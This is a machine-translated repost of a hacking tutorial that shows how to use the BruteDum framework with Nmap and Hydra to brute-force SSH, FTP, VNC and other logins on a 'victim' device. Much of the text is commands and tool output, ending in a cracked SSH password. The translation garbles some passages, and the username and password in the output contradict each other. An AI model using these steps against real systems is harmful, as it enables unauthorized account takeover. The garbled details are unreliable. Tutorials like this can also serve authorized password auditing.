قالب وردپرس درنا توس
Home / Tips and Tricks / How Brute-Force SSH, FTP, VNC & more with BruteDum «Null Byte :: WonderHowTo

How Brute-Force SSH, FTP, VNC & more with BruteDum «Null Byte :: WonderHowTo



Brutal forcing is an easy way to discover weak login information and is often one of the first steps when a hacker finds network services that are running on a network to which they have access. For beginners as well as experienced hackers, it is useful to have access to the right tools to discover, classify and then launch customized brute force attacks against a target. BruteDum does it all from a single framework.

Weak passwords are easy Prey

When a hacker gains access to a system with services running on it, one of the first things they usually do is see if they can log into any of those services that use standard or common references. Internet of Things (IoT) hardware and devices such as routers are often left with standard passwords enabled, making them easy to attack.

To test the services they discover for weak passwords, the hacker must select the right tool for the task, and it can be confusing to know which tool is best to use for a particular service.

BruteDum is a Python tool that allows a hacker to first acquire a target and perform a frame scan to determine the best tool based on what has been discovered. It is easy to perform a brute force or dictionary attack against almost any standard protocol that is vulnerable to it.

The advantage of running BruteDum over specific tools is the ability to perform a scan from the inside to identify which other processes might be running the same device, as well as organizing powerful tools for breaking into user accounts. on services such as SSH.

Online or connected attacks

Unlike attacks against WPA networks where we can grab a hash and try to crack it later, we must be directly connected to our target through the network to receive a brute forcing or dictionary attack. Although there are ways to hide our identity with a VPN or Tor, brute-force and dictionary attacks can be limited in effectiveness in various ways.

One way to limit brute force and dictionary attacks is via speed limiting, where a lockout is triggered after a certain number of incorrect login attempts. That, combined with flagging suspicious login attempts, can make brute force and dictionary attacks more likely to target a target.

To perform an online dictionary attack, we use THC Hydra, Medusa or Ncrack against the services we discover, using BruteDum to scan and organize our attacks between these tools. We also need a password list, which is crucial for the success or failure of our dictionary attack. If the password list is too large, it takes too long to attack the network, and if it is not reasonably long enough to contain the password, we run the risk that it is not in the list, causing the attack to fail.

What you need

To follow this guide, you must have Python3 installed on your system . I also recommend using Kali Linux, since most required programs should be installed by default. If you do this on another system, you must ensure that you have installed all required programs.

If you are not using Kali Linux, you can use Ubuntu or Debian, but you must ensure that Hydra, Medusa, and Ncrack are installed. You also need Nmap to scan.

We also need a password list to test, and in this case we will download it to a folder that we create later. If you have a favorite password list, you must copy it to the folder that we are going to create.

Step 1: Download and set up BruteDum

To start, we need to download the repository from GitHub. In a new terminal window you can type the following command to clone the repo.

  ~ $ git clone https://github.com/GitHackTools/BruteDum

Clones in & # 39; BruteDum & # 39; ...
remote: list objects: 15, done.
external: objects count: 100% (15/15), ready.
external: compress objects: 100% (14/14), ready.
external: Total 15 (delta 2), reused 0 (delta 0), pack reused 0
Unpack objects: 100% (15/15), ready. 

And this to navigate in the folder:

  ~ $ cd BruteDum 

From this folder you can execute BruteDum. Before we do that, we have to make a little quirk. I discovered that BruteDum could not find password lists that were stored outside the BruteDum folder, so the solution seems to add our password list directly there. To do this, I simply extract one from GitHub and download it to the folder where I am using with the wget command.

  ~ / BruteDum $ wget https: // raw .githubusercontent.com / berzerk0 / probable-Glossaries / master / Real-passwords / Top207-probable-v2.txt

--2020-01-10 17: 19: 59-- https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt
Resolving Raw.githubusercontent.com (raw.githubusercontent.com) ... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connect to raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.0.133 |: 443 ... connected.
HTTP request sent, awaiting response ... 200 OK
Length: 1620 (1.6K) [text/plain]
Save to: "Top207-probable-v2.txt"

Top207-probable-v2. 100% [===================>] 1.58K.- KB / s in 0s

2020-01-10 17:19:59 (53.3 MB / s) - & # 39; Top207-probable-v2.txt & # 39; saved [1620/1620] 

When it's done, we can execute BruteDum by typing the following command.

  ~ / BruteDum $ python3 brutedum.py

888888 888888 BRUTE
8 8 eeeee e eeeee eeee 8 8 e eeeeeee FORCE
8eeee8ee 8 8 8 8 8 8 8th 8 8 8 8 8 8 JUST
88 8 8th 8th 8th 8th 8th 88 8 8th 8 8th 8 8 FOR
88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 DE
88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES

[i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack
Author: https://GitHackTools.blogspot.com

[?] Enter the victim address: 

Step 2: Enter the target address

After the loading screen has been completed, we must enter the IP address of the victim. Once you have done this, press Enter and you will be given the option to perform an Nmap scan. It is a useful feature that allows you to discover other services that are open on the same device. Type Y and press Enter to perform the Nmap scan.

  [?] Enter the victim address: 192.168.43.1

[?] Do you want to scan the victim's gates with Nmap? [Y/n]: Y 

When the results return, you must be able to identify all ports that come back as "open". You must then select a service to crack. The menu for this is fairly easy to understand and you can choose one that matches the service that our Nmap scan has discovered.

  [+] Scanning gates with Nmap ...

Nmap 7.70 (https://nmap.org) starts on 2020-01-10 02:57 PDT
Nmap scan report for 192.168.43.1
Host is higher (0.0087s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21 / tcp open ftp
22 / TCP open SSH
80 / tcp open http
MAC address: ███.███.███.███.███.███

Nmap ready: 1 IP address (1 host higher) scanned in 0.95 seconds

[1] FTP [2] Telnet
(Standard port is 21) (Standard port is 23)
PostgreSQL [4] SSH
(Standard port is 5432) (Standard port is 22)
[5] RDP [6] VNC
(Standard port is 3389) (Standard port is 5900)

[?] What protocol do you want to crack? [1-6]: 4 

In our example, we select option 4 and press Enter to indicate that we want to do SSH cracking.

Step 3: Select the Tool

Now we must determine the tool that we will use to try to crack the password. Depending on the service we have selected, BruteDum will recommend using one.

  888888 888888 BRUTE
8 8 eeeee e eeeee eeee 8 8 e eeeeeee FORCE
8eeee8ee 8 8 8 8 8 8 8th 8 8 8 8 8 8 JUST
88 8 8th 8th 8th 8th 8th 88 8 8th 8 8th 8 8 FOR
88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 DE
88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES

[i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack
Author: https://GitHackTools.blogspot.com

[i] Target: 192.168.43.1
Protocol: ssh

[1] Ncrack
[2] Hydra (recommended)
Medusa

[?] Which tool do you want to use? [1-3]: 2 

We select Hydra because it is recommended for cracking SSH. Type 2 to specify Hydra (or the number of the tool you want to use) and press Enter to begin configuring.

Step 4: Set username and password lists [19659003] To launch our attack, we have to make a trade-off between time and probability. Our first option is to select a username list. That means we try every password in our password list with every username in our username list. It can become quite a few attempts very quickly.

In our example, we can select N to decline using a username list. Instead, we use a common username or username that we know exists by default on the device type.

  [i] Purpose: 192.168.43.1
Protocol: ssh
[?] Do you want to use the username list? [Y/n]: N 

Because we refused to provide a username list, we must enter it manually instead. Here I will enter for because I know that this is the username for our test device.

  [?] Enter the username: toor 

Next we need to set the password list. It doesn't work if we select a password list outside the folder we are in, so we can now add the password list that we downloaded earlier. If you've followed it before, we should just be able to paste the word list Top207-probable-v2.txt here.

  [?] Enter the word path: Top207-probable-v2.txt 

Step 5: Start the attack

Finally we can decide whether we want to use the standard port or not. Some devices may host services on a different port than the standard port, but this is not very common. For SSH, the default port is 22, so we just enter Y and press Enter .

  [?] Do you want to use the standard port? [Y/n]: Y 

If you are attacking a service on a non-standard port, you can specify it here and press . Enter . Do not accidentally type the number of the port that you want to attack here, because the script crashes.

Once you provide the port, BruteDum starts the utility you specified.

  [i] Purpose: 192.168.43.1
Protocol: ssh
[+] Hydra creaks ...

Hydra v8.8 (c) 2019 door van Hauser / THC - Do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) from 2020-01-10 09:23:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max. 16 tasks per 1 server, total 16 tasks, 208 login attempts (l: 1 / p: 208), ~ 13 attempts per task
[DATA] ssh: //192.168.43.1: 22 / 

attacks After some time to attack the network and try all passwords, you get a result, either reveal the password or report that a valid password is not found.

  [22] [ssh] host: 192.168.43.1 login: password: root
1 of 1 goal successfully completed, 1 valid password found
[WARNING] Writing recovery file because 3 last work threads were just completed.
[ERROR] 3 goals could not be solved or could not be connected
[ERROR] 16 goals are not completed
Hydra (https://github.com/vanhauser-thc/thc-hydra) ended on 2020-01-10 10:51:18

[?] Do you want conitnue? [Y/n]: N 

Brute-Force Attacks Find Weak Passwords

An important thing to remember about Brute-Force and Dictionary Attacks is that they are powerful in the right place, but no silver bullet for breaking into accounts . Weak passwords are especially easy to find with BruteDum, but more complicated passwords require longer password lists. This problem requires that prolonged contact with the victim is burned through those longer lists, making the attack less practical and clearer for anyone looking at this type of attack.

An ideal target for these attacks is primarily IoT devices, which are generally poor in security and an abundance of services that run with standard credentials.

I hope you enjoyed this manual for brute forcing weak login credentials with BruteDum! If you have questions about this tutorial on brute-forcing frameworks or you have a comment, there is the comments section below and you can reach me on Twitter @KodyKinzie .

Don't miss out: Use face recognition for OSINT in individuals and companies

Cover image by Kody / Null Byte




Source link